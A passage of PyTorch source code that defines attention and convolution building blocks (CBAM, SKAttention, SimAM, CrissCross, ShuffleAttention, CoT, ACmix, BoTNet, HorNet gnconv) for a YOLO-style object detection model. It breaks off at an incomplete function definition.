\nclass SpatialAttentionModule(nn.Module):\n def __init__(self):\n super(SpatialAttentionModule, self).__init__()\n self.conv2d = nn.Conv2d(in_channels=2, out_channels=1, kernel_size=7, stride=1, padding=3)\n self.act = nn.Sigmoid()\n def forward(self, x):\n avgout = torch.mean(x, dim=1, keepdim=True)\n maxout, _ = torch.max(x, dim=1, keepdim=True)\n out = torch.cat([avgout, maxout], dim=1)\n out = self.act(self.conv2d(out))\n return out\n\nclass CBAM(nn.Module):\n def __init__(self, c1,c2):\n super(CBAM, self).__init__()\n self.channel_attention = ChannelAttentionModule(c1)\n self.spatial_attention = SpatialAttentionModule()\n\n def forward(self, x):\n out = self.channel_attention(x) * x\n out = self.spatial_attention(out) * out\n return out\n \n\n# === CBAM end ===\n\n\n# === SKAttention start ===\n\n\n\nclass SKAttention(nn.Module):\n\n def __init__(self, channel=512,kernels=[1,3,5,7],reduction=16,group=32,L=32):\n super().__init__()\n self.d=max(L,channel//reduction)\n self.convs=nn.ModuleList([])\n for k in kernels:\n self.convs.append(\n nn.Sequential(OrderedDict([\n ('conv',nn.Conv2d(channel,channel,kernel_size=k,padding=k//2,groups=group)),\n ('bn',nn.BatchNorm2d(channel)),\n ('relu',nn.ReLU())\n ]))\n )\n self.fc=nn.Linear(channel,self.d)\n self.fcs=nn.ModuleList([])\n for i in range(len(kernels)):\n self.fcs.append(nn.Linear(self.d,channel))\n self.softmax=nn.Softmax(dim=0)\n\n\n\n def forward(self, x):\n bs, c, _, _ = x.size()\n conv_outs=[]\n ### split\n for conv in self.convs:\n conv_outs.append(conv(x))\n feats=torch.stack(conv_outs,0)#k,bs,channel,h,w\n\n ### fuse\n U=sum(conv_outs) #bs,c,h,w\n\n ### reduction channel\n S=U.mean(-1).mean(-1) #bs,c\n Z=self.fc(S) #bs,d\n\n ### calculate attention weight\n weights=[]\n for fc in self.fcs:\n weight=fc(Z)\n weights.append(weight.view(bs,c,1,1)) #bs,channel\n attention_weughts=torch.stack(weights,0)#k,bs,channel,1,1\n attention_weughts=self.softmax(attention_weughts)#k,bs,channel,1,1\n\n ### fuse\n V=(attention_weughts*feats).sum(0)\n return V\n\n\n\n# === SKAttention end ===\n\n\n# === SimAM start ===\n\nclass SimAM(torch.nn.Module):\n def __init__(self, channels = None, e_lambda = 1e-4):\n super(SimAM, self).__init__()\n\n self.activaton = nn.Sigmoid()\n self.e_lambda = e_lambda\n\n def __repr__(self):\n s = self.__class__.__name__ + '('\n s += ('lambda=%f)' % self.e_lambda)\n return s\n\n @staticmethod\n def get_module_name():\n return \"simam\"\n\n def forward(self, x):\n\n b, c, h, w = x.size()\n \n n = w * h - 1\n\n x_minus_mu_square = (x - x.mean(dim=[2,3], keepdim=True)).pow(2)\n y = x_minus_mu_square / (4 * (x_minus_mu_square.sum(dim=[2,3], keepdim=True) / n + self.e_lambda)) + 0.5\n\n return x * self.activaton(y) \n\n# === SimAM end ===\n\n# === S2 MLPv2 start ==\n\n# https://arxiv.org/abs/2108.01072\ndef spatial_shift1(x):\n b,w,h,c = x.size()\n x[:,1:,:,:c//4] = x[:,:w-1,:,:c//4]\n x[:,:w-1,:,c//4:c//2] = x[:,1:,:,c//4:c//2]\n x[:,:,1:,c//2:c*3//4] = x[:,:,:h-1,c//2:c*3//4]\n x[:,:,:h-1,3*c//4:] = x[:,:,1:,3*c//4:]\n return x\n\n\ndef spatial_shift2(x):\n b,w,h,c = x.size()\n x[:,:,1:,:c//4] = x[:,:,:h-1,:c//4]\n x[:,:,:h-1,c//4:c//2] = x[:,:,1:,c//4:c//2]\n x[:,1:,:,c//2:c*3//4] = x[:,:w-1,:,c//2:c*3//4]\n x[:,:w-1,:,3*c//4:] = x[:,1:,:,3*c//4:]\n return x\n\n\nclass SplitAttention(nn.Module):\n def __init__(self,channel=512,k=3):\n super().__init__()\n self.channel=channel\n self.k=k\n self.mlp1=nn.Linear(channel,channel,bias=False)\n self.gelu=nn.GELU()\n self.mlp2=nn.Linear(channel,channel*k,bias=False)\n self.softmax=nn.Softmax(1)\n \n def forward(self,x_all):\n b,k,h,w,c=x_all.shape\n x_all=x_all.reshape(b,k,-1,c) \n a=torch.sum(torch.sum(x_all,1),1) \n hat_a=self.mlp2(self.gelu(self.mlp1(a))) \n hat_a=hat_a.reshape(b,self.k,c) \n bar_a=self.softmax(hat_a) \n attention=bar_a.unsqueeze(-2) \n out=attention*x_all \n out=torch.sum(out,1).reshape(b,h,w,c)\n return out\n\n\nclass S2Attention(nn.Module):\n\n def __init__(self, channels=512 ):\n super().__init__()\n # print('S2Attention init 开始')\n self.mlp1 = nn.Linear(channels,channels*3)\n self.mlp2 = nn.Linear(channels,channels)\n self.split_attention = SplitAttention()\n # print('S2Attention init 结束')\n\n def forward(self, x):\n \n b,c,w,h = x.size()\n # print(x.size())\n x=x.permute(0,2,3,1)\n # print('S2Attention forward 开始 x={}',x.size())\n # print(self.mlp1)\n x = self.mlp1(x)\n # print('S2Attention forward 结束')\n x1 = spatial_shift1(x[:,:,:,:c])\n x2 = spatial_shift2(x[:,:,:,c:c*2])\n x3 = x[:,:,:,c*2:]\n x_all=torch.stack([x1,x2,x3],1)\n a = self.split_attention(x_all)\n x = self.mlp2(a)\n x=x.permute(0,3,1,2)\n \n return x\n\n# === S2 MLPv2 end ===\n\n# === CrissCrossAttention start === \n\n\ndef INF(B,H,W):\n return -torch.diag(torch.tensor(float(\"inf\")).repeat(H),0).unsqueeze(0).repeat(B*W,1,1)\n\n\nclass CrissCrossAttention(nn.Module):\n \"\"\" Criss-Cross Attention Module\"\"\"\n def __init__(self, in_dim):\n super(CrissCrossAttention,self).__init__()\n self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim//8, kernel_size=1)\n self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim//8, kernel_size=1)\n self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.softmax = Softmax(dim=3)\n self.INF = INF\n self.gamma = nn.Parameter(torch.zeros(1))\n\n\n def forward(self, x):\n device=x.device\n m_batchsize, _, height, width = x.size()\n proj_query = self.query_conv(x)\n proj_query_H = proj_query.permute(0,3,1,2).contiguous().view(m_batchsize*width,-1,height).permute(0, 2, 1).to(device)\n proj_query_W = proj_query.permute(0,2,1,3).contiguous().view(m_batchsize*height,-1,width).permute(0, 2, 1).to(device)\n proj_key = self.key_conv(x)\n proj_key_H = proj_key.permute(0,3,1,2).contiguous().view(m_batchsize*width,-1,height).to(device)\n proj_key_W = proj_key.permute(0,2,1,3).contiguous().view(m_batchsize*height,-1,width).to(device)\n proj_value = self.value_conv(x)\n proj_value_H = proj_value.permute(0,3,1,2).contiguous().view(m_batchsize*width,-1,height).to(device)\n proj_value_W = proj_value.permute(0,2,1,3).contiguous().view(m_batchsize*height,-1,width).to(device)\n energy_H = (torch.bmm(proj_query_H, proj_key_H).to('cpu')+self.INF(m_batchsize, height, width)).view(m_batchsize,width,height,height).permute(0,2,1,3).to(device)\n energy_W = torch.bmm(proj_query_W, proj_key_W).view(m_batchsize,height,width,width).to(device)\n concate = self.softmax(torch.cat([energy_H, energy_W], 3))\n\n att_H = concate[:,:,:,0:height].permute(0,2,1,3).contiguous().view(m_batchsize*width,height,height)\n att_W = concate[:,:,:,height:height+width].contiguous().view(m_batchsize*height,width,width)\n out_H = torch.bmm(proj_value_H, att_H.permute(0, 2, 1)).view(m_batchsize,width,-1,height).permute(0,2,3,1).to(device)\n out_W = torch.bmm(proj_value_W, att_W.permute(0, 2, 1)).view(m_batchsize,height,-1,width).permute(0,2,1,3).to(device)\n #print(out_H.size(),out_W.size())\n return self.gamma*(out_H + out_W) + x\n \n# === CrissCrossAttention end === \n\n\n# === shuffleAttention start ===\n\n\n# https://arxiv.org/pdf/2102.00240.pdf\nclass ShuffleAttention(nn.Module):\n\n def __init__(self, channel=512,reduction=16,G=8):\n super().__init__()\n self.G=G\n self.channel=channel\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.gn = nn.GroupNorm(channel // (2 * G), channel // (2 * G))\n self.cweight = Parameter(torch.zeros(1,channel // (2 * G) , 1, 1))\n self.cbias = Parameter(torch.ones(1, channel // (2 * G), 1, 1))\n self.sweight = Parameter(torch.zeros(1, channel // (2 * G), 1, 1))\n self.sbias = Parameter(torch.ones(1, channel // (2 * G), 1, 1))\n self.sigmoid=nn.Sigmoid()\n\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant_(m.weight, 1)\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal_(m.weight, std=0.001)\n if m.bias is not None:\n init.constant_(m.bias, 0)\n\n\n @staticmethod\n def channel_shuffle(x, groups):\n b, c, h, w = x.shape\n x = x.reshape(b, groups, -1, h, w)\n x = x.permute(0, 2, 1, 3, 4)\n\n # flatten\n x = x.reshape(b, -1, h, w)\n\n return x\n\n def forward(self, x):\n b, c, h, w = x.size()\n #group into subfeatures\n x=x.view(b*self.G,-1,h,w) #bs*G,c//G,h,w\n\n #channel_split\n x_0,x_1=x.chunk(2,dim=1) #bs*G,c//(2*G),h,w\n\n #channel attention\n # print(x_0.size(),x_1.size())\n x_channel=self.avg_pool(x_0) #bs*G,c//(2*G),1,1\n # print(self.cweight.size(),x_channel.size(),self.cbias.size())\n x_channel=self.cweight*x_channel+self.cbias #bs*G,c//(2*G),1,1\n x_channel=x_0*self.sigmoid(x_channel)\n\n #spatial attention\n x_spatial=self.gn(x_1) #bs*G,c//(2*G),h,w\n x_spatial=self.sweight*x_spatial+self.sbias #bs*G,c//(2*G),h,w\n x_spatial=x_1*self.sigmoid(x_spatial) #bs*G,c//(2*G),h,w\n\n # concatenate along channel axis\n out=torch.cat([x_channel,x_spatial],dim=1) #bs*G,c//G,h,w\n out=out.contiguous().view(b,-1,h,w)\n\n # channel shuffle\n out = self.channel_shuffle(out, 2)\n return out\n\n# === shuffleAttention end ===\n\n\n# build DWConvblock\n# -------------------------------------------------------------------------\nclass DWConvblock(nn.Module):\n \"Depthwise conv + Pointwise conv\"\n\n def __init__(self, in_channels, out_channels, k, s):\n super(DWConvblock, self).__init__()\n self.p = k // 2\n self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size=k, stride=s, padding=self.p, groups=in_channels,\n bias=False)\n self.bn1 = nn.BatchNorm2d(in_channels)\n self.conv2 = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn2 = nn.BatchNorm2d(out_channels)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = self.bn2(x)\n x = F.relu(x)\n return x\n\n# DWConvblock end\n# -------------------------------------------------------------------------\n\n\n# === picodet start ===\n\ndef channel_shuffle(x, groups=2): ##shuffle channel \n #RESHAPE----->transpose------->Flatten \n B, C, H, W = x.size()\n out = x.view(B, groups, C // groups, H, W).permute(0, 2, 1, 3, 4).contiguous()\n out=out.view(B, C, H, W) \n return out\n\n# PicoDet\nclass ES_SEModule(nn.Module):\n def __init__(self, channel, reduction=4):\n super().__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.conv1 = nn.Conv2d(\n in_channels=channel,\n out_channels=channel // reduction,\n kernel_size=1,\n stride=1,\n padding=0)\n self.relu = nn.ReLU()\n self.conv2 = nn.Conv2d(\n in_channels=channel // reduction,\n out_channels=channel,\n kernel_size=1,\n stride=1,\n padding=0)\n self.hardsigmoid = nn.Hardsigmoid()\n\n def forward(self, x):\n identity = x\n x = self.avg_pool(x)\n x = self.conv1(x)\n x = self.relu(x)\n x = self.conv2(x)\n x = self.hardsigmoid(x)\n out = identity * x\n return out\n \nclass ES_Bottleneck(nn.Module):\n def __init__(self, inp, oup, stride):\n super(ES_Bottleneck, self).__init__()\n\n if not (1 <= stride <= 3):\n raise ValueError('illegal stride value')\n self.stride = stride\n\n branch_features = oup // 2\n # assert (self.stride != 1) or (inp == branch_features << 1)\n\n if self.stride > 1:\n self.branch1 = nn.Sequential(\n self.depthwise_conv(inp, inp, kernel_size=3, stride=self.stride, padding=1),\n nn.BatchNorm2d(inp),\n nn.Conv2d(inp, branch_features, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(branch_features),\n nn.Hardswish(inplace=True),\n )\n\n self.branch2 = nn.Sequential(\n nn.Conv2d(inp if (self.stride > 1) else branch_features,\n branch_features, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(branch_features),\n nn.Hardswish(inplace=True),\n self.depthwise_conv(branch_features, branch_features, kernel_size=3, stride=self.stride, padding=1),\n nn.BatchNorm2d(branch_features),\n ES_SEModule(branch_features),\n nn.Conv2d(branch_features, branch_features, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(branch_features),\n nn.Hardswish(inplace=True),\n )\n\n self.branch3 = nn.Sequential(\n GhostConv(branch_features, branch_features, 3, 1),\n ES_SEModule(branch_features),\n nn.Conv2d(branch_features, branch_features, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(branch_features),\n nn.Hardswish(inplace=True),\n )\n\n self.branch4 = nn.Sequential(\n self.depthwise_conv(oup, oup, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(oup),\n nn.Conv2d(oup, oup, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(oup),\n nn.Hardswish(inplace=True),\n )\n\n\n @staticmethod\n def depthwise_conv(i, o, kernel_size=3, stride=1, padding=0, bias=False):\n return nn.Conv2d(i, o, kernel_size, stride, padding, bias=bias, groups=i)\n\n @staticmethod\n def conv1x1(i, o, kernel_size=1, stride=1, padding=0, bias=False):\n return nn.Conv2d(i, o, kernel_size, stride, padding, bias=bias)\n\n def forward(self, x):\n if self.stride == 1:\n x1, x2 = x.chunk(2, dim=1)\n x3 = torch.cat((x1, self.branch3(x2)), dim=1)\n out = channel_shuffle(x3, 2)\n elif self.stride == 2:\n x1 = torch.cat((self.branch1(x), self.branch2(x)), dim=1)\n out = self.branch4(x1)\n\n return out\n\nclass CBH(nn.Module):\n def __init__(self, num_channels, num_filters, filter_size, stride, num_groups=1):\n super().__init__()\n self.conv = nn.Conv2d(\n num_channels,\n num_filters,\n filter_size,\n stride,\n padding=(filter_size - 1) // 2,\n groups=num_groups,\n bias=False)\n self.bn = nn.BatchNorm2d(num_filters)\n self.hardswish = nn.Hardswish()\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n x = self.hardswish(x)\n return x\n\n def fuseforward(self, x):\n return self.hardswish(self.conv(x))\n\n\n# === picodet end ===\n\n# === CoT3 start ===\n\nclass CoT3(nn.Module):\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\n self.m = nn.Sequential(*[CoTBottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)])\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), dim=1))\n\nclass CoTBottleneck(nn.Module):\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\n super(CoTBottleneck, self).__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = CoT(c_, 3)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x))\n\nclass CoT(nn.Module):\n # Contextual Transformer Networks https://arxiv.org/abs/2107.12292\n def __init__(self, dim=512,kernel_size=3):\n super().__init__()\n self.dim=dim\n self.kernel_size=kernel_size\n\n self.key_embed=nn.Sequential(\n nn.Conv2d(dim,dim,kernel_size=kernel_size,padding=kernel_size//2,groups=4,bias=False),\n nn.BatchNorm2d(dim),\n nn.ReLU()\n )\n self.value_embed=nn.Sequential(\n nn.Conv2d(dim,dim,1,bias=False),\n nn.BatchNorm2d(dim)\n )\n\n factor=4\n self.attention_embed=nn.Sequential(\n nn.Conv2d(2*dim,2*dim//factor,1,bias=False),\n nn.BatchNorm2d(2*dim//factor),\n nn.ReLU(),\n nn.Conv2d(2*dim//factor,kernel_size*kernel_size*dim,1)\n )\n\n\n def forward(self, x):\n bs,c,h,w=x.shape\n k1=self.key_embed(x) #bs,c,h,w\n v=self.value_embed(x).view(bs,c,-1) #bs,c,h,w\n\n y=torch.cat([k1,x],dim=1) #bs,2c,h,w\n att=self.attention_embed(y) #bs,c*k*k,h,w\n att=att.reshape(bs,c,self.kernel_size*self.kernel_size,h,w)\n att=att.mean(2,keepdim=False).view(bs,c,-1) #bs,c,h*w\n k2=F.softmax(att,dim=-1)*v\n k2=k2.view(bs,c,h,w)\n \n return k1+k2\n\n# === CoT3 end ===\n\n\n# === C3HB start===\nclass C3HB(nn.Module):\n # CSP HorBlock with 3 convolutions by iscyy/yoloair\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1)\n self.m = nn.Sequential(*(HorBlock(c_) for _ in range(n)))\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), dim=1))\n\n# === C3HB end ===\n\n\n# ==== acmix start ===\n\ndef position(H, W, is_cuda=True):\n if is_cuda:\n loc_w = torch.linspace(-1.0, 1.0, W).cuda().unsqueeze(0).repeat(H, 1)\n loc_h = torch.linspace(-1.0, 1.0, H).cuda().unsqueeze(1).repeat(1, W)\n else:\n loc_w = torch.linspace(-1.0, 1.0, W).unsqueeze(0).repeat(H, 1)\n loc_h = torch.linspace(-1.0, 1.0, H).unsqueeze(1).repeat(1, W)\n loc = torch.cat([loc_w.unsqueeze(0), loc_h.unsqueeze(0)], 0).unsqueeze(0)\n return loc\n\n\ndef stride(x, stride):\n b, c, h, w = x.shape\n return x[:, :, ::stride, ::stride]\n\ndef init_rate_half(tensor):\n if tensor is not None:\n tensor.data.fill_(0.5)\n\ndef init_rate_0(tensor):\n if tensor is not None:\n tensor.data.fill_(0.)\n\n\nclass ACmix(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_att=7, head=4, kernel_conv=3, stride=1, dilation=1):\n super(ACmix, self).__init__()\n self.in_planes = in_planes\n self.out_planes = out_planes\n self.head = head\n self.kernel_att = kernel_att\n self.kernel_conv = kernel_conv\n self.stride = stride\n self.dilation = dilation\n self.rate1 = torch.nn.Parameter(torch.Tensor(1))\n self.rate2 = torch.nn.Parameter(torch.Tensor(1))\n self.head_dim = self.out_planes // self.head\n\n self.conv1 = nn.Conv2d(in_planes, out_planes, kernel_size=1)\n self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1)\n self.conv3 = nn.Conv2d(in_planes, out_planes, kernel_size=1)\n self.conv_p = nn.Conv2d(2, self.head_dim, kernel_size=1)\n\n self.padding_att = (self.dilation * (self.kernel_att - 1) + 1) // 2\n self.pad_att = torch.nn.ReflectionPad2d(self.padding_att)\n self.unfold = nn.Unfold(kernel_size=self.kernel_att, padding=0, stride=self.stride)\n self.softmax = torch.nn.Softmax(dim=1)\n\n self.fc = nn.Conv2d(3*self.head, self.kernel_conv * self.kernel_conv, kernel_size=1, bias=False)\n self.dep_conv = nn.Conv2d(self.kernel_conv * self.kernel_conv * self.head_dim, out_planes, kernel_size=self.kernel_conv, bias=True, groups=self.head_dim, padding=1, stride=stride)\n\n self.reset_parameters()\n \n def reset_parameters(self):\n init_rate_half(self.rate1)\n init_rate_half(self.rate2)\n kernel = torch.zeros(self.kernel_conv * self.kernel_conv, self.kernel_conv, self.kernel_conv)\n for i in range(self.kernel_conv * self.kernel_conv):\n kernel[i, i//self.kernel_conv, i%self.kernel_conv] = 1.\n kernel = kernel.squeeze(0).repeat(self.out_planes, 1, 1, 1)\n self.dep_conv.weight = nn.Parameter(data=kernel, requires_grad=True)\n self.dep_conv.bias = init_rate_0(self.dep_conv.bias)\n\n def forward(self, x):\n q, k, v = self.conv1(x), self.conv2(x), self.conv3(x)\n scaling = float(self.head_dim) ** -0.5\n b, c, h, w = q.shape\n h_out, w_out = h//self.stride, w//self.stride\n\n\n # ### att\n # ## positional encoding\n pe = self.conv_p(position(h, w, x.is_cuda))\n\n q_att = q.view(b*self.head, self.head_dim, h, w) * scaling\n k_att = k.view(b*self.head, self.head_dim, h, w)\n v_att = v.view(b*self.head, self.head_dim, h, w)\n\n if self.stride > 1:\n q_att = stride(q_att, self.stride)\n q_pe = stride(pe, self.stride)\n else:\n q_pe = pe\n\n unfold_k = self.unfold(self.pad_att(k_att)).view(b*self.head, self.head_dim, self.kernel_att*self.kernel_att, h_out, w_out) # b*head, head_dim, k_att^2, h_out, w_out\n unfold_rpe = self.unfold(self.pad_att(pe)).view(1, self.head_dim, self.kernel_att*self.kernel_att, h_out, w_out) # 1, head_dim, k_att^2, h_out, w_out\n \n att = (q_att.unsqueeze(2)*(unfold_k + q_pe.unsqueeze(2) - unfold_rpe)).sum(1) # (b*head, head_dim, 1, h_out, w_out) * (b*head, head_dim, k_att^2, h_out, w_out) -> (b*head, k_att^2, h_out, w_out)\n att = self.softmax(att)\n\n out_att = self.unfold(self.pad_att(v_att)).view(b*self.head, self.head_dim, self.kernel_att*self.kernel_att, h_out, w_out)\n out_att = (att.unsqueeze(1) * out_att).sum(2).view(b, self.out_planes, h_out, w_out)\n\n ## conv\n f_all = self.fc(torch.cat([q.view(b, self.head, self.head_dim, h*w), k.view(b, self.head, self.head_dim, h*w), v.view(b, self.head, self.head_dim, h*w)], 1))\n f_conv = f_all.permute(0, 2, 1, 3).reshape(x.shape[0], -1, x.shape[-2], x.shape[-1])\n \n out_conv = self.dep_conv(f_conv)\n\n return self.rate1 * out_att + self.rate2 * out_conv\n\n\n# ==== acmix end ====\n\n# === botnet start ===\n\nclass MHSA(nn.Module):\n def __init__(self, n_dims, width=14, height=14, heads=4,pos_emb=False):\n super(MHSA, self).__init__()\n\n self.heads = heads\n self.query = nn.Conv2d(n_dims, n_dims, kernel_size=1)\n self.key = nn.Conv2d(n_dims, n_dims, kernel_size=1)\n self.value = nn.Conv2d(n_dims, n_dims, kernel_size=1)\n self.pos=pos_emb\n if self.pos :\n self.rel_h_weight = nn.Parameter(torch.randn([1, heads, (n_dims ) // heads, 1, int(height)]), requires_grad=True)\n self.rel_w_weight = nn.Parameter(torch.randn([1, heads, (n_dims )// heads, int(width), 1]), requires_grad=True)\n self.softmax = nn.Softmax(dim=-1)\n \n def forward(self, x):\n n_batch, C, width, height = x.size() \n q = self.query(x).view(n_batch, self.heads, C // self.heads, -1)\n k = self.key(x).view(n_batch, self.heads, C // self.heads, -1)\n v = self.value(x).view(n_batch, self.heads, C // self.heads, -1)\n #print('q shape:{},k shape:{},v shape:{}'.format(q.shape,k.shape,v.shape)) #1,4,64,256\n content_content = torch.matmul(q.permute(0,1,3,2), k) #1,C,h*w,h*w\n # print(\"qkT=\",content_content.shape)\n c1,c2,c3,c4=content_content.size()\n if self.pos:\n # print(\"old content_content shape\",content_content.shape) #1,4,256,256\n content_position = (self.rel_h_weight + self.rel_w_weight).view(1, self.heads, C // self.heads, -1).permute(0,1,3,2) #1,4,1024,64\n \n content_position = torch.matmul(content_position, q)# ([1, 4, 1024, 256])\n content_position=content_position if(content_content.shape==content_position.shape)else content_position[:,: , :c3,]\n assert(content_content.shape==content_position.shape)\n #print('new pos222-> shape:',content_position.shape)\n # print('new content222-> shape:',content_content.shape)\n energy = content_content + content_position\n else:\n energy=content_content\n attention = self.softmax(energy)\n out = torch.matmul(v, attention.permute(0,1,3,2)) #1,4,256,64\n out = out.view(n_batch, C, width, height)\n return out\nclass BottleneckTransformer(nn.Module):\n # Transformer bottleneck\n #expansion = 1\n\n def __init__(self, c1, c2, stride=1, heads=4, mhsa=True, resolution=None,expansion=1):\n super(BottleneckTransformer, self).__init__()\n c_=int(c2*expansion)\n self.cv1 = Conv(c1, c_, 1,1)\n #self.bn1 = nn.BatchNorm2d(c2)\n if not mhsa:\n self.cv2 = Conv(c_,c2, 3, 1)\n else:\n self.cv2 = nn.ModuleList()\n self.cv2.append(MHSA(c2, width=int(resolution[0]), height=int(resolution[1]), heads=heads))\n if stride == 2:\n self.cv2.append(nn.AvgPool2d(2, 2))\n self.cv2 = nn.Sequential(*self.cv2)\n self.shortcut = c1==c2 \n if stride != 1 or c1 != expansion*c2:\n self.shortcut = nn.Sequential(\n nn.Conv2d(c1, expansion*c2, kernel_size=1, stride=stride),\n nn.BatchNorm2d(expansion*c2)\n )\n self.fc1 = nn.Linear(c2, c2) \n\n def forward(self, x):\n out=x + self.cv2(self.cv1(x)) if self.shortcut else self.cv2(self.cv1(x))\n return out\n \nclass BoT3(nn.Module):\n # CSP Bottleneck with 3 convolutions\n def __init__(self, c1, c2, n=1,e=0.5,e2=1,w=20,h=20): # ch_in, ch_out, number, , expansion,w,h\n super(BoT3, self).__init__()\n c_ = int(c2*e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\n self.m = nn.Sequential(*[BottleneckTransformer(c_ ,c_, stride=1, heads=4,mhsa=True,resolution=(w,h),expansion=e2) for _ in range(n)])\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), dim=1)) \n\n\n# === botnet end\n\n\ndef autopad(k, p=None): # kernel, padding\n # Pad to 'same'\n if p is None:\n p = k // 2 if isinstance(k, int) else [x // 2 for x in k] # auto-pad\n return p\n\nclass DropPath(nn.Module):\n \"\"\"Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n \"\"\"\n\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n\n def forward(self, x):\n return drop_path_f(x, self.drop_prob, self.training)\n\ndef drop_path_f(x, drop_prob: float = 0., training: bool = False):\n \"\"\"Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,\n the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...\n See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for\n changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use\n 'survival rate' as the argument.\n \"\"\"\n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets\n random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_() # binarize\n output = x.div(keep_prob) * random_tensor\n return output\n\n\nclass HorLayerNorm(nn.Module):\n r\"\"\" LayerNorm that supports two data formats: channels_last (default) or channels_first. \n The ordering of the dimensions in the inputs. channels_last corresponds to inputs with \n shape (batch_size, height, width, channels) while channels_first corresponds to inputs \n with shape (batch_size, channels, height, width).# https://ar5iv.labs.arxiv.org/html/2207.14284\n \"\"\"\n def __init__(self, normalized_shape, eps=1e-6, data_format=\"channels_last\"):\n super().__init__()\n self.weight = nn.Parameter(torch.ones(normalized_shape))\n self.bias = nn.Parameter(torch.zeros(normalized_shape))\n self.eps = eps\n self.data_format = data_format\n if self.data_format not in [\"channels_last\", \"channels_first\"]:\n raise NotImplementedError # by iscyy/air\n self.normalized_shape = (normalized_shape, )\n \n def forward(self, x):\n if self.data_format == \"channels_last\":\n return F.layer_norm(x, self.normalized_shape, self.weight, self.bias, self.eps)\n elif self.data_format == \"channels_first\":\n u = x.mean(1, keepdim=True)\n s = (x - u).pow(2).mean(1, keepdim=True)\n x = (x - u) / torch.sqrt(s + self.eps)\n x = self.weight[:, None, None] * x + self.bias[:, None, None]\n return x\n\n# add by liuqian 2022-08-28 参考 https://blog.csdn.net/qq_38668236/article/details/126410711\n# HorNet结合YOLO ==start==\nclass gnconv(nn.Module): # gnconv模块\n def __init__(self, dim, order=5, gflayer=None, h=14, w=8, s=1.0):\n super().__init__()\n self.order = order\n self.dims = [dim // 2 ** i for i in range(order)]\n self.dims.reverse()\n self.proj_in = nn.Conv2d(dim, 2*dim, 1)\n\n if gflayer is None:\n self.dwconv = get_dwconv(sum(self.dims), 7, True)\n else:\n self.dwconv = gflayer(sum(self.dims), h=h, w=w)\n \n self.proj_out = nn.Conv2d(dim, dim, 1)\n\n self.pws = nn.ModuleList(\n [nn.Conv2d(self.dims[i], self.dims[i+1], 1) for i in range(order-1)]\n )\n self.scale = s\n\n def forward(self, x, mask=None, dummy=False):\n fused_x = self.proj_in(x)\n pwa, abc = torch.split(fused_x, (self.dims[0], sum(self.dims)), dim=1)\n dw_abc = self.dwconv(abc) * self.scale\n dw_list = torch.split(dw_abc, self.dims, dim=1)\n x = pwa * dw_list[0]\n for i in range(self.order -1):\n x = self.pws[i](x) * dw_list[i+1]\n x = self.proj_out(x)\n\n return x\n\ndef 